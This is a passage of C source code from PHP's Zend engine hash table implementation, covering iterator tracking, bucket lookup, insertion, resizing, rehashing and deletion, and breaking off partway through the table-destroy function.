HashTableIterator *iter = EG(ht_iterators);
HashTableIterator *end = iter + EG(ht_iterators_count);
uint32_t idx;
if (EXPECTED(ht->u.v.nIteratorsCount != 255)) {
ht->u.v.nIteratorsCount++;
}
while (iter != end) {
if (iter->ht == NULL) {
iter->ht = ht;
iter->pos = pos;
idx = iter - EG(ht_iterators);
if (idx + 1 > EG(ht_iterators_used)) {
EG(ht_iterators_used) = idx + 1;
}
return idx;
}
iter++;
}
if (EG(ht_iterators) == EG(ht_iterators_slots)) {
EG(ht_iterators) = emalloc(sizeof(HashTableIterator) * (EG(ht_iterators_count) + 8));
memcpy(EG(ht_iterators), EG(ht_iterators_slots), sizeof(HashTableIterator) * EG(ht_iterators_count));
} else {
EG(ht_iterators) = erealloc(EG(ht_iterators), sizeof(HashTableIterator) * (EG(ht_iterators_count) + 8));
}
iter = EG(ht_iterators) + EG(ht_iterators_count);
EG(ht_iterators_count) += 8;
iter->ht = ht;
iter->pos = pos;
memset(iter + 1, 0, sizeof(HashTableIterator) * 7);
idx = iter - EG(ht_iterators);
EG(ht_iterators_used) = idx + 1;
return idx;
}
ZEND_API HashPosition ZEND_FASTCALL zend_hash_iterator_pos(uint32_t idx, HashTable *ht)
{
HashTableIterator *iter = EG(ht_iterators) + idx;
ZEND_ASSERT(idx != (uint32_t)-1);
if (iter->pos == HT_INVALID_IDX) {
return HT_INVALID_IDX;
} else if (UNEXPECTED(iter->ht != ht)) {
if (EXPECTED(iter->ht) && EXPECTED(iter->ht != HT_POISONED_PTR)
&& EXPECTED(iter->ht->u.v.nIteratorsCount != 255)) {
iter->ht->u.v.nIteratorsCount--;
}
if (EXPECTED(ht->u.v.nIteratorsCount != 255)) {
ht->u.v.nIteratorsCount++;
}
iter->ht = ht;
iter->pos = ht->nInternalPointer;
}
return iter->pos;
}
ZEND_API HashPosition ZEND_FASTCALL zend_hash_iterator_pos_ex(uint32_t idx, zval *array)
{
HashTable *ht = Z_ARRVAL_P(array);
HashTableIterator *iter = EG(ht_iterators) + idx;
ZEND_ASSERT(idx != (uint32_t)-1);
if (iter->pos == HT_INVALID_IDX) {
return HT_INVALID_IDX;
} else if (UNEXPECTED(iter->ht != ht)) {
if (EXPECTED(iter->ht) && EXPECTED(iter->ht != HT_POISONED_PTR)
&& EXPECTED(iter->ht->u.v.nIteratorsCount != 255)) {
iter->ht->u.v.nIteratorsCount--;
}
SEPARATE_ARRAY(array);
ht = Z_ARRVAL_P(array);
if (EXPECTED(ht->u.v.nIteratorsCount != 255)) {
ht->u.v.nIteratorsCount++;
}
iter->ht = ht;
iter->pos = ht->nInternalPointer;
}
return iter->pos;
}
ZEND_API void ZEND_FASTCALL zend_hash_iterator_del(uint32_t idx)
{
HashTableIterator *iter = EG(ht_iterators) + idx;
ZEND_ASSERT(idx != (uint32_t)-1);
if (EXPECTED(iter->ht) && EXPECTED(iter->ht != HT_POISONED_PTR)
&& EXPECTED(iter->ht->u.v.nIteratorsCount != 255)) {
iter->ht->u.v.nIteratorsCount--;
}
iter->ht = NULL;
if (idx == EG(ht_iterators_used) - 1) {
while (idx > 0 && EG(ht_iterators)[idx - 1].ht == NULL) {
idx--;
}
EG(ht_iterators_used) = idx;
}
}
static zend_never_inline void ZEND_FASTCALL _zend_hash_iterators_remove(HashTable *ht)
{
HashTableIterator *iter = EG(ht_iterators);
HashTableIterator *end = iter + EG(ht_iterators_used);
while (iter != end) {
if (iter->ht == ht) {
iter->ht = HT_POISONED_PTR;
}
iter++;
}
}
static zend_always_inline void zend_hash_iterators_remove(HashTable *ht)
{
if (UNEXPECTED(ht->u.v.nIteratorsCount)) {
_zend_hash_iterators_remove(ht);
}
}
ZEND_API HashPosition ZEND_FASTCALL zend_hash_iterators_lower_pos(HashTable *ht, HashPosition start)
{
HashTableIterator *iter = EG(ht_iterators);
HashTableIterator *end = iter + EG(ht_iterators_used);
HashPosition res = HT_INVALID_IDX;
while (iter != end) {
if (iter->ht == ht) {
if (iter->pos >= start && iter->pos < res) {
res = iter->pos;
}
}
iter++;
}
return res;
}
ZEND_API void ZEND_FASTCALL _zend_hash_iterators_update(HashTable *ht, HashPosition from, HashPosition to)
{
HashTableIterator *iter = EG(ht_iterators);
HashTableIterator *end = iter + EG(ht_iterators_used);
while (iter != end) {
if (iter->ht == ht && iter->pos == from) {
iter->pos = to;
}
iter++;
}
}
static zend_always_inline Bucket *zend_hash_find_bucket(const HashTable *ht, zend_string *key)
{
zend_ulong h;
uint32_t nIndex;
uint32_t idx;
Bucket *p, *arData;
h = zend_string_hash_val(key);
arData = ht->arData;
nIndex = h | ht->nTableMask;
idx = HT_HASH_EX(arData, nIndex);
while (EXPECTED(idx != HT_INVALID_IDX)) {
p = HT_HASH_TO_BUCKET_EX(arData, idx);
if (EXPECTED(p->key == key)) { /* check for the same interned string */
return p;
} else if (EXPECTED(p->h == h) &&
EXPECTED(p->key) &&
EXPECTED(ZSTR_LEN(p->key) == ZSTR_LEN(key)) &&
EXPECTED(memcmp(ZSTR_VAL(p->key), ZSTR_VAL(key), ZSTR_LEN(key)) == 0)) {
return p;
}
idx = Z_NEXT(p->val);
}
return NULL;
}
static zend_always_inline Bucket *zend_hash_str_find_bucket(const HashTable *ht, const char *str, size_t len, zend_ulong h)
{
uint32_t nIndex;
uint32_t idx;
Bucket *p, *arData;
arData = ht->arData;
nIndex = h | ht->nTableMask;
idx = HT_HASH_EX(arData, nIndex);
while (idx != HT_INVALID_IDX) {
ZEND_ASSERT(idx < HT_IDX_TO_HASH(ht->nTableSize));
p = HT_HASH_TO_BUCKET_EX(arData, idx);
if ((p->h == h)
&& p->key
&& (ZSTR_LEN(p->key) == len)
&& !memcmp(ZSTR_VAL(p->key), str, len)) {
return p;
}
idx = Z_NEXT(p->val);
}
return NULL;
}
static zend_always_inline Bucket *zend_hash_index_find_bucket(const HashTable *ht, zend_ulong h)
{
uint32_t nIndex;
uint32_t idx;
Bucket *p, *arData;
arData = ht->arData;
nIndex = h | ht->nTableMask;
idx = HT_HASH_EX(arData, nIndex);
while (idx != HT_INVALID_IDX) {
ZEND_ASSERT(idx < HT_IDX_TO_HASH(ht->nTableSize));
p = HT_HASH_TO_BUCKET_EX(arData, idx);
if (p->h == h && !p->key) {
return p;
}
idx = Z_NEXT(p->val);
}
return NULL;
}
static zend_always_inline zval *_zend_hash_add_or_update_i(HashTable *ht, zend_string *key, zval *pData, uint32_t flag ZEND_FILE_LINE_DC)
{
zend_ulong h;
uint32_t nIndex;
uint32_t idx;
Bucket *p;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
if (UNEXPECTED(!(ht->u.flags & HASH_FLAG_INITIALIZED))) {
CHECK_INIT(ht, 0);
goto add_to_hash;
} else if (ht->u.flags & HASH_FLAG_PACKED) {
zend_hash_packed_to_hash(ht);
} else if ((flag & HASH_ADD_NEW) == 0) {
p = zend_hash_find_bucket(ht, key);
if (p) {
zval *data;
if (flag & HASH_ADD) {
if (!(flag & HASH_UPDATE_INDIRECT)) {
return NULL;
}
ZEND_ASSERT(&p->val != pData);
data = &p->val;
if (Z_TYPE_P(data) == IS_INDIRECT) {
data = Z_INDIRECT_P(data);
if (Z_TYPE_P(data) != IS_UNDEF) {
return NULL;
}
} else {
return NULL;
}
} else {
ZEND_ASSERT(&p->val != pData);
data = &p->val;
if ((flag & HASH_UPDATE_INDIRECT) && Z_TYPE_P(data) == IS_INDIRECT) {
data = Z_INDIRECT_P(data);
}
}
HANDLE_BLOCK_INTERRUPTIONS();
if (ht->pDestructor) {
ht->pDestructor(data);
}
ZVAL_COPY_VALUE(data, pData);
HANDLE_UNBLOCK_INTERRUPTIONS();
return data;
}
}
ZEND_HASH_IF_FULL_DO_RESIZE(ht); /* If the Hash table is full, resize it */
add_to_hash:
HANDLE_BLOCK_INTERRUPTIONS();
idx = ht->nNumUsed++;
ht->nNumOfElements++;
if (ht->nInternalPointer == HT_INVALID_IDX) {
ht->nInternalPointer = idx;
}
zend_hash_iterators_update(ht, HT_INVALID_IDX, idx);
p = ht->arData + idx;
p->key = key;
if (!ZSTR_IS_INTERNED(key)) {
zend_string_addref(key);
ht->u.flags &= ~HASH_FLAG_STATIC_KEYS;
zend_string_hash_val(key);
}
p->h = h = ZSTR_H(key);
ZVAL_COPY_VALUE(&p->val, pData);
nIndex = h | ht->nTableMask;
Z_NEXT(p->val) = HT_HASH(ht, nIndex);
HT_HASH(ht, nIndex) = HT_IDX_TO_HASH(idx);
HANDLE_UNBLOCK_INTERRUPTIONS();
return &p->val;
}
ZEND_API zval* ZEND_FASTCALL _zend_hash_add_or_update(HashTable *ht, zend_string *key, zval *pData, uint32_t flag ZEND_FILE_LINE_DC)
{
return _zend_hash_add_or_update_i(ht, key, pData, flag ZEND_FILE_LINE_RELAY_CC);
}
ZEND_API zval* ZEND_FASTCALL _zend_hash_add(HashTable *ht, zend_string *key, zval *pData ZEND_FILE_LINE_DC)
{
return _zend_hash_add_or_update_i(ht, key, pData, HASH_ADD ZEND_FILE_LINE_RELAY_CC);
}
ZEND_API zval* ZEND_FASTCALL _zend_hash_update(HashTable *ht, zend_string *key, zval *pData ZEND_FILE_LINE_DC)
{
return _zend_hash_add_or_update_i(ht, key, pData, HASH_UPDATE ZEND_FILE_LINE_RELAY_CC);
}
ZEND_API zval* ZEND_FASTCALL _zend_hash_update_ind(HashTable *ht, zend_string *key, zval *pData ZEND_FILE_LINE_DC)
{
return _zend_hash_add_or_update_i(ht, key, pData, HASH_UPDATE | HASH_UPDATE_INDIRECT ZEND_FILE_LINE_RELAY_CC);
}
ZEND_API zval* ZEND_FASTCALL _zend_hash_add_new(HashTable *ht, zend_string *key, zval *pData ZEND_FILE_LINE_DC)
{
return _zend_hash_add_or_update_i(ht, key, pData, HASH_ADD_NEW ZEND_FILE_LINE_RELAY_CC);
}
ZEND_API zval* ZEND_FASTCALL _zend_hash_str_add_or_update(HashTable *ht, const char *str, size_t len, zval *pData, uint32_t flag ZEND_FILE_LINE_DC)
{
zend_string *key = zend_string_init(str, len, ht->u.flags & HASH_FLAG_PERSISTENT);
zval *ret = _zend_hash_add_or_update_i(ht, key, pData, flag ZEND_FILE_LINE_RELAY_CC);
zend_string_release(key);
return ret;
}
ZEND_API zval* ZEND_FASTCALL _zend_hash_str_update(HashTable *ht, const char *str, size_t len, zval *pData ZEND_FILE_LINE_DC)
{
zend_string *key = zend_string_init(str, len, ht->u.flags & HASH_FLAG_PERSISTENT);
zval *ret = _zend_hash_add_or_update_i(ht, key, pData, HASH_UPDATE ZEND_FILE_LINE_RELAY_CC);
zend_string_release(key);
return ret;
}
ZEND_API zval* ZEND_FASTCALL _zend_hash_str_update_ind(HashTable *ht, const char *str, size_t len, zval *pData ZEND_FILE_LINE_DC)
{
zend_string *key = zend_string_init(str, len, ht->u.flags & HASH_FLAG_PERSISTENT);
zval *ret = _zend_hash_add_or_update_i(ht, key, pData, HASH_UPDATE | HASH_UPDATE_INDIRECT ZEND_FILE_LINE_RELAY_CC);
zend_string_release(key);
return ret;
}
ZEND_API zval* ZEND_FASTCALL _zend_hash_str_add(HashTable *ht, const char *str, size_t len, zval *pData ZEND_FILE_LINE_DC)
{
zend_string *key = zend_string_init(str, len, ht->u.flags & HASH_FLAG_PERSISTENT);
zval *ret = _zend_hash_add_or_update_i(ht, key, pData, HASH_ADD ZEND_FILE_LINE_RELAY_CC);
zend_string_release(key);
return ret;
}
ZEND_API zval* ZEND_FASTCALL _zend_hash_str_add_new(HashTable *ht, const char *str, size_t len, zval *pData ZEND_FILE_LINE_DC)
{
zend_string *key = zend_string_init(str, len, ht->u.flags & HASH_FLAG_PERSISTENT);
zval *ret = _zend_hash_add_or_update_i(ht, key, pData, HASH_ADD_NEW ZEND_FILE_LINE_RELAY_CC);
zend_string_delref(key);
return ret;
}
ZEND_API zval* ZEND_FASTCALL zend_hash_index_add_empty_element(HashTable *ht, zend_ulong h)
{
zval dummy;
ZVAL_NULL(&dummy);
return zend_hash_index_add(ht, h, &dummy);
}
ZEND_API zval* ZEND_FASTCALL zend_hash_add_empty_element(HashTable *ht, zend_string *key)
{
zval dummy;
ZVAL_NULL(&dummy);
return zend_hash_add(ht, key, &dummy);
}
ZEND_API zval* ZEND_FASTCALL zend_hash_str_add_empty_element(HashTable *ht, const char *str, size_t len)
{
zval dummy;
ZVAL_NULL(&dummy);
return zend_hash_str_add(ht, str, len, &dummy);
}
static zend_always_inline zval *_zend_hash_index_add_or_update_i(HashTable *ht, zend_ulong h, zval *pData, uint32_t flag ZEND_FILE_LINE_DC)
{
uint32_t nIndex;
uint32_t idx;
Bucket *p;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
if (UNEXPECTED(!(ht->u.flags & HASH_FLAG_INITIALIZED))) {
CHECK_INIT(ht, h < ht->nTableSize);
if (h < ht->nTableSize) {
p = ht->arData + h;
goto add_to_packed;
}
goto add_to_hash;
} else if (ht->u.flags & HASH_FLAG_PACKED) {
if (h < ht->nNumUsed) {
p = ht->arData + h;
if (Z_TYPE(p->val) != IS_UNDEF) {
if (flag & HASH_ADD) {
return NULL;
}
if (ht->pDestructor) {
ht->pDestructor(&p->val);
}
ZVAL_COPY_VALUE(&p->val, pData);
if ((zend_long)h >= (zend_long)ht->nNextFreeElement) {
ht->nNextFreeElement = h < ZEND_LONG_MAX ? h + 1 : ZEND_LONG_MAX;
}
return &p->val;
} else { /* we have to keep the order :( */
goto convert_to_hash;
}
} else if (EXPECTED(h < ht->nTableSize)) {
p = ht->arData + h;
} else if ((h >> 1) < ht->nTableSize &&
(ht->nTableSize >> 1) < ht->nNumOfElements) {
zend_hash_packed_grow(ht);
p = ht->arData + h;
} else {
goto convert_to_hash;
}
add_to_packed:
HANDLE_BLOCK_INTERRUPTIONS();
/* incremental initialization of empty Buckets */
if ((flag & (HASH_ADD_NEW|HASH_ADD_NEXT)) == (HASH_ADD_NEW|HASH_ADD_NEXT)) {
ht->nNumUsed = h + 1;
} else if (h >= ht->nNumUsed) {
if (h > ht->nNumUsed) {
Bucket *q = ht->arData + ht->nNumUsed;
while (q != p) {
ZVAL_UNDEF(&q->val);
q++;
}
}
ht->nNumUsed = h + 1;
}
ht->nNumOfElements++;
if (ht->nInternalPointer == HT_INVALID_IDX) {
ht->nInternalPointer = h;
}
zend_hash_iterators_update(ht, HT_INVALID_IDX, h);
if ((zend_long)h >= (zend_long)ht->nNextFreeElement) {
ht->nNextFreeElement = h < ZEND_LONG_MAX ? h + 1 : ZEND_LONG_MAX;
}
p->h = h;
p->key = NULL;
ZVAL_COPY_VALUE(&p->val, pData);
HANDLE_UNBLOCK_INTERRUPTIONS();
return &p->val;
convert_to_hash:
zend_hash_packed_to_hash(ht);
} else if ((flag & HASH_ADD_NEW) == 0) {
p = zend_hash_index_find_bucket(ht, h);
if (p) {
if (flag & HASH_ADD) {
return NULL;
}
ZEND_ASSERT(&p->val != pData);
HANDLE_BLOCK_INTERRUPTIONS();
if (ht->pDestructor) {
ht->pDestructor(&p->val);
}
ZVAL_COPY_VALUE(&p->val, pData);
HANDLE_UNBLOCK_INTERRUPTIONS();
if ((zend_long)h >= (zend_long)ht->nNextFreeElement) {
ht->nNextFreeElement = h < ZEND_LONG_MAX ? h + 1 : ZEND_LONG_MAX;
}
return &p->val;
}
}
ZEND_HASH_IF_FULL_DO_RESIZE(ht); /* If the Hash table is full, resize it */
add_to_hash:
HANDLE_BLOCK_INTERRUPTIONS();
idx = ht->nNumUsed++;
ht->nNumOfElements++;
if (ht->nInternalPointer == HT_INVALID_IDX) {
ht->nInternalPointer = idx;
}
zend_hash_iterators_update(ht, HT_INVALID_IDX, idx);
if ((zend_long)h >= (zend_long)ht->nNextFreeElement) {
ht->nNextFreeElement = h < ZEND_LONG_MAX ? h + 1 : ZEND_LONG_MAX;
}
p = ht->arData + idx;
p->h = h;
p->key = NULL;
nIndex = h | ht->nTableMask;
ZVAL_COPY_VALUE(&p->val, pData);
Z_NEXT(p->val) = HT_HASH(ht, nIndex);
HT_HASH(ht, nIndex) = HT_IDX_TO_HASH(idx);
HANDLE_UNBLOCK_INTERRUPTIONS();
return &p->val;
}
ZEND_API zval* ZEND_FASTCALL _zend_hash_index_add_or_update(HashTable *ht, zend_ulong h, zval *pData, uint32_t flag ZEND_FILE_LINE_DC)
{
return _zend_hash_index_add_or_update_i(ht, h, pData, flag ZEND_FILE_LINE_RELAY_CC);
}
ZEND_API zval* ZEND_FASTCALL _zend_hash_index_add(HashTable *ht, zend_ulong h, zval *pData ZEND_FILE_LINE_DC)
{
return _zend_hash_index_add_or_update_i(ht, h, pData, HASH_ADD ZEND_FILE_LINE_RELAY_CC);
}
ZEND_API zval* ZEND_FASTCALL _zend_hash_index_add_new(HashTable *ht, zend_ulong h, zval *pData ZEND_FILE_LINE_DC)
{
return _zend_hash_index_add_or_update_i(ht, h, pData, HASH_ADD | HASH_ADD_NEW ZEND_FILE_LINE_RELAY_CC);
}
ZEND_API zval* ZEND_FASTCALL _zend_hash_index_update(HashTable *ht, zend_ulong h, zval *pData ZEND_FILE_LINE_DC)
{
return _zend_hash_index_add_or_update_i(ht, h, pData, HASH_UPDATE ZEND_FILE_LINE_RELAY_CC);
}
ZEND_API zval* ZEND_FASTCALL _zend_hash_next_index_insert(HashTable *ht, zval *pData ZEND_FILE_LINE_DC)
{
return _zend_hash_index_add_or_update_i(ht, ht->nNextFreeElement, pData, HASH_ADD | HASH_ADD_NEXT ZEND_FILE_LINE_RELAY_CC);
}
ZEND_API zval* ZEND_FASTCALL _zend_hash_next_index_insert_new(HashTable *ht, zval *pData ZEND_FILE_LINE_DC)
{
return _zend_hash_index_add_or_update_i(ht, ht->nNextFreeElement, pData, HASH_ADD | HASH_ADD_NEW | HASH_ADD_NEXT ZEND_FILE_LINE_RELAY_CC);
}
static void ZEND_FASTCALL zend_hash_do_resize(HashTable *ht)
{
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
if (ht->nNumUsed > ht->nNumOfElements + (ht->nNumOfElements >> 5)) { /* additional term is there to amortize the cost of compaction */
HANDLE_BLOCK_INTERRUPTIONS();
zend_hash_rehash(ht);
HANDLE_UNBLOCK_INTERRUPTIONS();
} else if (ht->nTableSize < HT_MAX_SIZE) { /* Let's double the table size */
void *new_data, *old_data = HT_GET_DATA_ADDR(ht);
uint32_t nSize = ht->nTableSize + ht->nTableSize;
Bucket *old_buckets = ht->arData;
HANDLE_BLOCK_INTERRUPTIONS();
new_data = pemalloc(HT_SIZE_EX(nSize, -nSize), ht->u.flags & HASH_FLAG_PERSISTENT);
ht->nTableSize = nSize;
ht->nTableMask = -ht->nTableSize;
HT_SET_DATA_ADDR(ht, new_data);
memcpy(ht->arData, old_buckets, sizeof(Bucket) * ht->nNumUsed);
pefree(old_data, ht->u.flags & HASH_FLAG_PERSISTENT);
zend_hash_rehash(ht);
HANDLE_UNBLOCK_INTERRUPTIONS();
} else {
zend_error_noreturn(E_ERROR, "Possible integer overflow in memory allocation (%zu * %zu + %zu)", ht->nTableSize * 2, sizeof(Bucket) + sizeof(uint32_t), sizeof(Bucket));
}
}
ZEND_API int ZEND_FASTCALL zend_hash_rehash(HashTable *ht)
{
Bucket *p;
uint32_t nIndex, i;
IS_CONSISTENT(ht);
if (UNEXPECTED(ht->nNumOfElements == 0)) {
if (ht->u.flags & HASH_FLAG_INITIALIZED) {
ht->nNumUsed = 0;
HT_HASH_RESET(ht);
}
return SUCCESS;
}
HT_HASH_RESET(ht);
i = 0;
p = ht->arData;
if (ht->nNumUsed == ht->nNumOfElements) {
do {
nIndex = p->h | ht->nTableMask;
Z_NEXT(p->val) = HT_HASH(ht, nIndex);
HT_HASH(ht, nIndex) = HT_IDX_TO_HASH(i);
p++;
} while (++i < ht->nNumUsed);
} else {
do {
if (UNEXPECTED(Z_TYPE(p->val) == IS_UNDEF)) {
uint32_t j = i;
Bucket *q = p;
if (EXPECTED(ht->u.v.nIteratorsCount == 0)) {
while (++i < ht->nNumUsed) {
p++;
if (EXPECTED(Z_TYPE_INFO(p->val) != IS_UNDEF)) {
ZVAL_COPY_VALUE(&q->val, &p->val);
q->h = p->h;
nIndex = q->h | ht->nTableMask;
q->key = p->key;
Z_NEXT(q->val) = HT_HASH(ht, nIndex);
HT_HASH(ht, nIndex) = HT_IDX_TO_HASH(j);
if (UNEXPECTED(ht->nInternalPointer == i)) {
ht->nInternalPointer = j;
}
q++;
j++;
}
}
} else {
uint32_t iter_pos = zend_hash_iterators_lower_pos(ht, 0);
while (++i < ht->nNumUsed) {
p++;
if (EXPECTED(Z_TYPE_INFO(p->val) != IS_UNDEF)) {
ZVAL_COPY_VALUE(&q->val, &p->val);
q->h = p->h;
nIndex = q->h | ht->nTableMask;
q->key = p->key;
Z_NEXT(q->val) = HT_HASH(ht, nIndex);
HT_HASH(ht, nIndex) = HT_IDX_TO_HASH(j);
if (UNEXPECTED(ht->nInternalPointer == i)) {
ht->nInternalPointer = j;
}
if (UNEXPECTED(i == iter_pos)) {
zend_hash_iterators_update(ht, i, j);
iter_pos = zend_hash_iterators_lower_pos(ht, iter_pos + 1);
}
q++;
j++;
}
}
}
ht->nNumUsed = j;
break;
}
nIndex = p->h | ht->nTableMask;
Z_NEXT(p->val) = HT_HASH(ht, nIndex);
HT_HASH(ht, nIndex) = HT_IDX_TO_HASH(i);
p++;
} while (++i < ht->nNumUsed);
}
return SUCCESS;
}
static zend_always_inline void _zend_hash_del_el_ex(HashTable *ht, uint32_t idx, Bucket *p, Bucket *prev)
{
HANDLE_BLOCK_INTERRUPTIONS();
if (!(ht->u.flags & HASH_FLAG_PACKED)) {
if (prev) {
Z_NEXT(prev->val) = Z_NEXT(p->val);
} else {
HT_HASH(ht, p->h | ht->nTableMask) = Z_NEXT(p->val);
}
}
if (HT_IDX_TO_HASH(ht->nNumUsed - 1) == idx) {
do {
ht->nNumUsed--;
} while (ht->nNumUsed > 0 && (UNEXPECTED(Z_TYPE(ht->arData[ht->nNumUsed-1].val) == IS_UNDEF)));
}
ht->nNumOfElements--;
if (HT_IDX_TO_HASH(ht->nInternalPointer) == idx || UNEXPECTED(ht->u.v.nIteratorsCount)) {
uint32_t new_idx;
new_idx = idx = HT_HASH_TO_IDX(idx);
while (1) {
new_idx++;
if (new_idx >= ht->nNumUsed) {
new_idx = HT_INVALID_IDX;
break;
} else if (Z_TYPE(ht->arData[new_idx].val) != IS_UNDEF) {
break;
}
}
if (ht->nInternalPointer == idx) {
ht->nInternalPointer = new_idx;
}
zend_hash_iterators_update(ht, idx, new_idx);
}
if (p->key) {
zend_string_release(p->key);
}
if (ht->pDestructor) {
zval tmp;
ZVAL_COPY_VALUE(&tmp, &p->val);
ZVAL_UNDEF(&p->val);
ht->pDestructor(&tmp);
} else {
ZVAL_UNDEF(&p->val);
}
HANDLE_UNBLOCK_INTERRUPTIONS();
}
static zend_always_inline void _zend_hash_del_el(HashTable *ht, uint32_t idx, Bucket *p)
{
Bucket *prev = NULL;
if (!(ht->u.flags & HASH_FLAG_PACKED)) {
uint32_t nIndex = p->h | ht->nTableMask;
uint32_t i = HT_HASH(ht, nIndex);
if (i != idx) {
prev = HT_HASH_TO_BUCKET(ht, i);
while (Z_NEXT(prev->val) != idx) {
i = Z_NEXT(prev->val);
prev = HT_HASH_TO_BUCKET(ht, i);
}
}
}
_zend_hash_del_el_ex(ht, idx, p, prev);
}
ZEND_API void ZEND_FASTCALL zend_hash_del_bucket(HashTable *ht, Bucket *p)
{
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
_zend_hash_del_el(ht, HT_IDX_TO_HASH(p - ht->arData), p);
}
ZEND_API int ZEND_FASTCALL zend_hash_del(HashTable *ht, zend_string *key)
{
zend_ulong h;
uint32_t nIndex;
uint32_t idx;
Bucket *p;
Bucket *prev = NULL;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
h = zend_string_hash_val(key);
nIndex = h | ht->nTableMask;
idx = HT_HASH(ht, nIndex);
while (idx != HT_INVALID_IDX) {
p = HT_HASH_TO_BUCKET(ht, idx);
if ((p->key == key) ||
(p->h == h &&
p->key &&
ZSTR_LEN(p->key) == ZSTR_LEN(key) &&
memcmp(ZSTR_VAL(p->key), ZSTR_VAL(key), ZSTR_LEN(key)) == 0)) {
_zend_hash_del_el_ex(ht, idx, p, prev);
return SUCCESS;
}
prev = p;
idx = Z_NEXT(p->val);
}
return FAILURE;
}
ZEND_API int ZEND_FASTCALL zend_hash_del_ind(HashTable *ht, zend_string *key)
{
zend_ulong h;
uint32_t nIndex;
uint32_t idx;
Bucket *p;
Bucket *prev = NULL;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
h = zend_string_hash_val(key);
nIndex = h | ht->nTableMask;
idx = HT_HASH(ht, nIndex);
while (idx != HT_INVALID_IDX) {
p = HT_HASH_TO_BUCKET(ht, idx);
if ((p->key == key) ||
(p->h == h &&
p->key &&
ZSTR_LEN(p->key) == ZSTR_LEN(key) &&
memcmp(ZSTR_VAL(p->key), ZSTR_VAL(key), ZSTR_LEN(key)) == 0)) {
if (Z_TYPE(p->val) == IS_INDIRECT) {
zval *data = Z_INDIRECT(p->val);
if (UNEXPECTED(Z_TYPE_P(data) == IS_UNDEF)) {
return FAILURE;
} else {
if (ht->pDestructor) {
zval tmp;
ZVAL_COPY_VALUE(&tmp, data);
ZVAL_UNDEF(data);
ht->pDestructor(&tmp);
} else {
ZVAL_UNDEF(data);
}
ht->u.v.flags |= HASH_FLAG_HAS_EMPTY_IND;
}
} else {
_zend_hash_del_el_ex(ht, idx, p, prev);
}
return SUCCESS;
}
prev = p;
idx = Z_NEXT(p->val);
}
return FAILURE;
}
ZEND_API int ZEND_FASTCALL zend_hash_str_del_ind(HashTable *ht, const char *str, size_t len)
{
zend_ulong h;
uint32_t nIndex;
uint32_t idx;
Bucket *p;
Bucket *prev = NULL;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
h = zend_inline_hash_func(str, len);
nIndex = h | ht->nTableMask;
idx = HT_HASH(ht, nIndex);
while (idx != HT_INVALID_IDX) {
p = HT_HASH_TO_BUCKET(ht, idx);
if ((p->h == h)
&& p->key
&& (ZSTR_LEN(p->key) == len)
&& !memcmp(ZSTR_VAL(p->key), str, len)) {
if (Z_TYPE(p->val) == IS_INDIRECT) {
zval *data = Z_INDIRECT(p->val);
if (UNEXPECTED(Z_TYPE_P(data) == IS_UNDEF)) {
return FAILURE;
} else {
if (ht->pDestructor) {
ht->pDestructor(data);
}
ZVAL_UNDEF(data);
ht->u.v.flags |= HASH_FLAG_HAS_EMPTY_IND;
}
} else {
_zend_hash_del_el_ex(ht, idx, p, prev);
}
return SUCCESS;
}
prev = p;
idx = Z_NEXT(p->val);
}
return FAILURE;
}
ZEND_API int ZEND_FASTCALL zend_hash_str_del(HashTable *ht, const char *str, size_t len)
{
zend_ulong h;
uint32_t nIndex;
uint32_t idx;
Bucket *p;
Bucket *prev = NULL;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
h = zend_inline_hash_func(str, len);
nIndex = h | ht->nTableMask;
idx = HT_HASH(ht, nIndex);
while (idx != HT_INVALID_IDX) {
p = HT_HASH_TO_BUCKET(ht, idx);
if ((p->h == h)
&& p->key
&& (ZSTR_LEN(p->key) == len)
&& !memcmp(ZSTR_VAL(p->key), str, len)) {
_zend_hash_del_el_ex(ht, idx, p, prev);
return SUCCESS;
}
prev = p;
idx = Z_NEXT(p->val);
}
return FAILURE;
}
ZEND_API int ZEND_FASTCALL zend_hash_index_del(HashTable *ht, zend_ulong h)
{
uint32_t nIndex;
uint32_t idx;
Bucket *p;
Bucket *prev = NULL;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
if (ht->u.flags & HASH_FLAG_PACKED) {
if (h < ht->nNumUsed) {
p = ht->arData + h;
if (Z_TYPE(p->val) != IS_UNDEF) {
_zend_hash_del_el_ex(ht, HT_IDX_TO_HASH(h), p, NULL);
return SUCCESS;
}
}
return FAILURE;
}
nIndex = h | ht->nTableMask;
idx = HT_HASH(ht, nIndex);
while (idx != HT_INVALID_IDX) {
p = HT_HASH_TO_BUCKET(ht, idx);
if ((p->h == h) && (p->key == NULL)) {
_zend_hash_del_el_ex(ht, idx, p, prev);
return SUCCESS;
}
prev = p;
idx = Z_NEXT(p->val);
}
return FAILURE;
}
ZEND_API void ZEND_FASTCALL zend_hash_destroy(HashTable *ht)
{
Bucket *p, *end;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) <= 1);
if (ht->nNumUsed) {
p = ht->arData;
end = p + ht->nNumUsed;
if (ht->pDestructor) {
SET_INCONSISTENT(HT_IS_DESTROYING);
if (ht->u.flags & (HASH_FLAG_PACKED|HASH_FLAG_STATIC_KEYS)) {
if (ht->nNumUsed == ht->nNumOfElements) {
do {
ht->pDestructor(&p->val);
} while (++p != end);
} else {
do {
if (EXPECTED(Z_TYPE(p->val) != IS_UNDEF)) {
ht->pDestructor(&p->val);
}
} while (++p != end);
}
} else if (ht->nNumUsed == ht->nNumOfElements) {
do {
ht->pDestructor(&p->val);
if (EXPECTED(p->key)) {
zend_string_release(p->key);
}
} while (++p != end);
} else {
do {
if (EXPECTED(Z_TYPE(p->val) != IS_UNDEF)) {
ht->pDestructor(&p->val);
if (EXPECTED(p->key)) {
zend_string_release(p->key);
}
}
} while (++p != end);
}
SET_INCONSISTENT(HT_DESTROYED);
} else {
if (!(ht->u.flags & (HASH_FLAG_PACKED|HASH_FLAG_STATIC_KEYS))) {
do {
